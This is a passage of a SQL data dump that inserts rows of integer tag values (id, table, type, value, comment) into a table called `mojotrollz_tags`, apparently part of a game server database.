3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1645, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1839, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1840, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1845, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1846, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1849, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1850, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1852, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1852, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1853, 3, 20, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1853, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2024, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2025, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2026, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2027, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2028, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2029, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2030, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2101, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2117, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2119, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2120, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2121, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2122, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2123, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2124, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2125, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2126, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2127, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2130, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2131, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2132, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2134, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2139, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2141, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2142, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2143, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2144, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2145, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2146, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2148, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2148, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2149, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2149, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2150, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2150, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2151, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2151, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2152, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2152, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2153, 3, 20, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2153, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2156, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2158, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2159, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2160, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2207, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2208, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2209, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2379, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2380, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2381, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2383, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2384, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2385, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2392, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2393, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2394, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2395, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2396, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2397, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2417, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2417, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2418, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2418, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2419, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2419, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2420, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2420, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2421, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2421, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2422, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2422, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2423, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2423, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2424, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2424, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2425, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2426, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2426, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2427, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2427, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2428, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2428, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2429, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2429, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2431, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2431, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2432, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2432, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2434, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2434, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2435, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2435, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2437, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2437, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2438, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2438, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2440, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2440, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2441, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2445, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2446, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2448, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2451, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2463, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2463, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2464, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2464, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2465, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2465, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2468, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2468, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2469, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2469, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2470, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2470, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2471, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2471, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2472, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2472, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2473, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2473, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2474, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2474, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2475, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2475, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2479, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2480, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2488, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2489, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2490, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2491, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2492, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2493, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2494, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2495, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2509, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2510, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2511, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2520, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2521, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2522, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2523, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2524, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2525, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2526, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2527, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2528, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2529, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2530, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2531, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2532, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2533, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2534, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2535, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2593, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2594, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2595, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2596, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2612, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2613, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2614, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2615, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2616, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2617, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2618, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2723, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3023, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3024, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3025, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3026, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3027, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3587, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3587, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3588, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3588, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3589, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3590, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3591, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3592, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3593, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3593, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3594, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3594, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3597, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3598, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3599, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3600, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3602, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3603, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3889, 3, 20, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3889, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3890, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3891, 3, 20, 16, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3891, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3892, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3892, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3893, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3893, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3894, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3894, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5441, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6526, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7371, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8088, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8088, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8089, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8089, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8090, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8090, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8091, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8091, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8092, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8092, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8093, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8093, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8094, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8094, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8766, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11362, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15807, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15808, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15809, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15903, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15904, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15905, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15906, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15907, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15909, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16795, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16795, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 